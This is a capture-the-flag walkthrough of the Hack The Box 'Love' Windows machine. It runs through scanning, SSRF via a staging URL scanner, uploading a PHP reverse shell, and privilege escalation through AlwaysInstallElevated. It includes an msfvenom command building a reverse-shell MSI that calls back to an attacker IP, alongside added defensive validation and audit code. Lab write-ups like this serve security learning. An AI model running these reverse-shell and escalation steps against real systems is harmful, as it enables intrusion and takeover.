# Love (Easy)

## Enumeration

### Nmap

```
nmap -sC -sV 10.10.10.239
```

```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 02:53 EDT
Nmap scan report for www.love.htb (10.10.10.239)
Host is up (0.16s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LPDString, NULL, RPCCheck, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe: 
|_    Host '10.10.16.4' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=5/31%Time=60B487E9%P=x86_64-pc-linux-gnu%r(NU
SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines,
SF:49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x
SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,49,"E
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,49,"E\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,49,"E\0\0\x01
SF:\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,49,"E\0\0\x01\xffj\x
SF:04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20t
SF:o\x20this\x20MariaDB\x20server")%r(DNSVersionBindReqTCP,49,"E\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect
SF:\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusRequestTCP,49,"E\0\0\x
SF:01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(Help,49,"E\0\0\x01\xffj\x04
SF:Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\
SF:x20this\x20MariaDB\x20server")%r(TerminalServerCookie,49,"E\0\0\x01\xff
SF:j\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(Kerberos,49,"E\0\0\x01\xffj\x04Ho
SF:st\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(SMBProgNeg,49,"E\0\0\x01\xffj\x04Host\x2
SF:0'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this
SF:\x20MariaDB\x20server")%r(X11Probe,49,"E\0\0\x01\xffj\x04Host\x20'10\.1
SF:0\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mar
SF:iaDB\x20server")%r(FourOhFourRequest,49,"E\0\0\x01\xffj\x04Host\x20'10\
SF:.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20M
SF:ariaDB\x20server")%r(LPDString,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.1
SF:6\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB
SF:\x20server");
Service Info: Hosts: www.example.com, LOVE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 21m33s, deviation: 0s, median: 21m32s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-31T07:15:18
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.02 seconds
```

So many open ports :) Yeah, it's a Windows machine.

Before we start, note the subdomain that shows up in the TLS certificate on port 443:

**staging.love.htb**

```
ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
```

Let's put it in the **/etc/hosts** file.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb00fjcvQPXOwvhZvKq%2F-Mb0NI7UTshfi6PtBSmU%2Fimage.png?alt=media\&token=00730401-9959-40eb-b678-838c1248ebf7)

OK, let's start enumerating :)

### Gobuster

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.239/ 
```

```
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.239/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/05/31 03:58:19 Starting gobuster
===============================================================
/images (Status: 301)
/Images (Status: 301)
/admin (Status: 301)
/plugins (Status: 301)
/includes (Status: 301)
/dist (Status: 301)
/licenses (Status: 403)
/IMAGES (Status: 301)
/%20 (Status: 403)
Progress: 4881 / 220561 (2.21%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/05/31 03:59:08 Finished
===============================================================
```

We can see there are some directories that might be accessible.

### Web Enumeration

When we go to port 80, we can see there is a login form.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0OUROEjMv6F33_1Nz%2Fimage.png?alt=media\&token=26ed42c3-36a5-4234-b034-bdeb1c498931)

Then we go to port 5000 and get this forbidden message:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0OcoVWZL8zZgKw3VP%2Fimage.png?alt=media\&token=d9d8b664-deee-4f75-ab79-246875f13664)

Let's navigate to **staging.love.htb**

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0PUBqJZdIyNIFNAU3%2Fimage.png?alt=media\&token=4064bb8a-f888-438d-a19d-e5bac0a6ea25)

Wow, a completely new page. Let's navigate to the **demo** page.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0PdsMiYlI6B1epuoz%2Fimage.png?alt=media\&token=e93ddf26-20ca-475b-a89f-c6e0ffcbe217)

We can specify a URL to scan; after a few tries, we realized it might have an SSRF vulnerability.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0Q3ka7oUUhElgwtZ3%2Fimage.png?alt=media\&token=74f47c96-fb24-4aec-93df-d7bc4f39b495)

Port 80 gives us nothing, so let's try port 5000, which returned 403 Forbidden a moment ago when we requested it directly.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0QH1D4JT7I_f959W-%2Fimage.png?alt=media\&token=d2d4d822-5f8d-4d0e-9170-b378940866c0)

Wow, credentials!!
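The scanner on the staging site fetched whatever URL it was given, which is how a port that is forbidden from the outside became reachable from the inside. As an added example (not code from the box or from the Voting System application), here is how a URL-fetching feature like that should validate its target before fetching: allowlist the scheme and port, resolve the host, and refuse anything that lands on a loopback, private or otherwise non-public address. The `resolver` parameter is an assumption added so the check can be exercised without DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}      # a public URL scanner has no business reaching port 5000


def resolve(host):
    """Default resolver: every address the name currently resolves to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_safe_scan_target(url, resolver=resolve):
    """Return (ok, reason). Rejects anything that could reach an internal service."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "userinfo not allowed"
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = resolver(parts.hostname)
    except OSError:                      # socket.gaierror is a subclass
        return False, "unresolvable host"
    for addr in addrs:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False, f"unparseable address {addr}"
        # Treat IPv4-mapped IPv6 (::ffff:127.0.0.1) as the IPv4 address it wraps
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
            ip = ip.ipv4_mapped
        if (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
            return False, f"{parts.hostname} resolves to non-public address {addr}"
    return True, "ok"
```

Because resolving and fetching are separate steps, the fetch must connect to the address that was validated (and re-validate after every redirect), otherwise DNS rebinding or an open redirect walks straight past this check.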

Let's navigate to **/admin** on port 80 to log in.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0RRj6C3O-NIHPvIqG%2Fimage.png?alt=media\&token=e9bcda54-322d-42c5-b768-6a252b4acc0c)

Now, we can try to upload a shell.

## Reverse Shell

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0RXWSXu1UEvau4HBp%2Fimage.png?alt=media\&token=4f4a0b5d-5a28-4444-baaa-5f65176ff3e1)

We can upload a reverse shell here, since the upload does not check the file extension.

After that, the file will be stored under **/Images**.

> Note: We need to use a Windows reverse shell, as the Linux version of course will not work :)
>
> Link to download the Windows reverse shell file: [Here](https://github.com/ivan-sincek/php-reverse-shell)
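The upload above succeeds because nothing checks what is being stored in **/Images**. As an added example (not the Voting System's own code), this is the kind of check that would have stopped a `.php` file from landing in a web-served directory: an extension allowlist, a magic-byte check against the declared type, and a server-generated filename so the user-supplied name never reaches disk. The size limit and the allowlist contents are assumptions.

```python
import os
import secrets

# Allowlist keyed by extension, with the magic bytes each type must start with.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024   # assumed limit for a profile image


def validate_upload(filename, data):
    """Return (ok, reason, stored_name). Only the generated name ever touches disk."""
    if len(data) > MAX_BYTES:
        return False, "file too large", None
    # Strip any directory part (Windows or POSIX separators) before inspecting
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext or '(none)'} not allowed", None
    if not data.startswith(ALLOWED_TYPES[ext]):   # bytes.startswith accepts a tuple
        return False, "content does not match declared type", None
    # A random name defeats double-extension tricks (shell.php.png) and overwrites,
    # and the caller should write it to a directory the web server will not execute.
    stored = secrets.token_hex(16) + ext
    return True, "ok", stored
```

A magic-byte check does not stop a polyglot (a valid GIF header followed by PHP), which is why the storage directory must also be one where the server serves files as static content only.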

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0S9V1x4_jGOFZj8fN%2Fimage.png?alt=media\&token=c0b4f659-417c-4af1-8146-3cd52750c147)

We can change the IP and port at the end of the file and upload it!

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0SLo_NQE4aAZuY72o%2Fimage.png?alt=media\&token=42185bfa-7541-4e65-960d-b2234204f37f)

We can see the reverse shell file has been uploaded.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0SUOXiMZGUT_gPZLd%2Fimage.png?alt=media\&token=c797e8e2-4204-4774-be30-cbf323ccfb15)

Finally, we have a user shell!

## Privilege Escalation

Then we can run winPEAS to find the vulnerability.

After searching for a while, we found this vulnerability:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0UeOrpaBPLl9hnswC%2Fimage.png?alt=media\&token=067aa397-ecb7-4422-9841-248e33dfe3db)

After Googling for some time, we found this [article](https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/).

We can use method 1 listed in the article by building an MSI payload using msfvenom:

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=5555 -f msi -o reverse.msi
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0Vxij48qQSNR6PBGZ%2Fimage.png?alt=media\&token=bcf1a916-34d3-42cc-b95a-95cc64a00127)

After we have created this file, we can send it over to the victim machine.

After that, we can spawn another reverse shell.
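The misconfiguration winPEAS flagged, AlwaysInstallElevated, only takes effect when the value is set to 1 in both the HKLM and HKCU policy keys; if either hive is missing it or has it at 0, `msiexec` installs with the user's own privileges. As an added audit check (not from the box or from winPEAS), this script parses `reg query` output for that value and reports whether the policy is actually in force; the sample `reg query` output is constructed to match the tool's usual format.

```python
import re
import subprocess

KEY_PATH = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE = "AlwaysInstallElevated"

# Constructed samples of what `reg query <hive>\<KEY_PATH> /v AlwaysInstallElevated` prints
SAMPLE_HKLM_ON = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU_OFF = "ERROR: The system was unable to find the specified registry key or value."


def parse_reg_dword(output, name):
    """Pull a REG_DWORD value out of `reg query` output; None if the value is absent."""
    pattern = rf"^\s*{re.escape(name)}\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$"
    m = re.search(pattern, output, re.MULTILINE)
    return int(m.group(1), 0) if m else None   # base 0 handles both 0x1 and 1


def always_install_elevated(hklm_output, hkcu_output):
    """True only when BOTH hives set the value to 1, which is when the policy applies."""
    return (parse_reg_dword(hklm_output, VALUE) == 1
            and parse_reg_dword(hkcu_output, VALUE) == 1)


def query(hive):
    """Run reg.exe for one hive; only meaningful on Windows, returns its stdout."""
    proc = subprocess.run(["reg", "query", hive + "\\" + KEY_PATH, "/v", VALUE],
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    effective = always_install_elevated(query("HKLM"), query("HKCU"))
    print("AlwaysInstallElevated effective:", effective)
```

The fix is to set the value to 0 (or remove it) in both hives, via Group Policy under Computer/User Configuration > Administrative Templates > Windows Components > Windows Installer.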

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0_NjxJWdovcZi47xc%2Fimage.png?alt=media\&token=bbda8da4-20c7-40ce-aad9-e23bc34454d9)

ayy root.

Congratz.
